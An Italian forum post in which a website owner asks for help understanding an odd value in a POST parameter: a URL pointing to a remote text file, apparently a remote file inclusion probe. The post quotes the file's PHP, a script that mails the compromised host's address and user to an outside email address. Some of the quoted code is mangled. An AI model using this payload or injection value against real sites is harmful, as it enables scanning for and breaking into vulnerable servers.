Salve

mi serve un aiuto per capire cosa è successo.

Semplificando, nel sito, ho 2 pagine PHP che si richiamano tramite metodo POST, viene passata una variabile K che contiene una stringa fatta di soli numeri.
Le stringhe vengono memorizzate per calcoli statistici.
Analizzando gli accessi mi trovo il seguente valore anomalo:

K=http://swiatodziezy.com/libraries/inside.txt?

e se ci clicco mi appare il contenuto del file di testo:

Codice PHP:
<?php
//=================================
//
//    scan - [RiCArDiM] - inb0x hotmail v1.0
//
//  
//      
//
//
//     priv8 file
//=================================
//
 ini_set("max_execution_time",-1);
 set_time_limit(0);
 $user = @get_current_user();
 $email "$user";
 $assunto "dkfft";
 $email1 "kazzu.237@gmail.com";
 $headers .= "From:dkfft.com<$email>\r\n";
 $html '=p';

$headers  "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1";

 if(mail($email1$assunto$html $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
 echo "Opa spamei";
 exit();
 }
 else{
 echo "Opa";
 exit();
 }
?>

Sicuramente hanno cercato di fare qualcosa... avete idea di cosa?

Grazie per eventuali suggerimenti